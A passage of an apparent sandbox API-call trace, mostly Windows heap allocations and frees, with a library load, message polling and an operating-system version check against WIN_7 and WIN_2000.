Size=0x10) returned 0x24a9af8 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.579] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.580] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0206.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.581] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.581] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.581] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18a8 [0206.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.582] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.583] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.583] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.583] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.584] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.584] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.585] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.586] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.587] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.588] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.589] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.589] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.590] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: 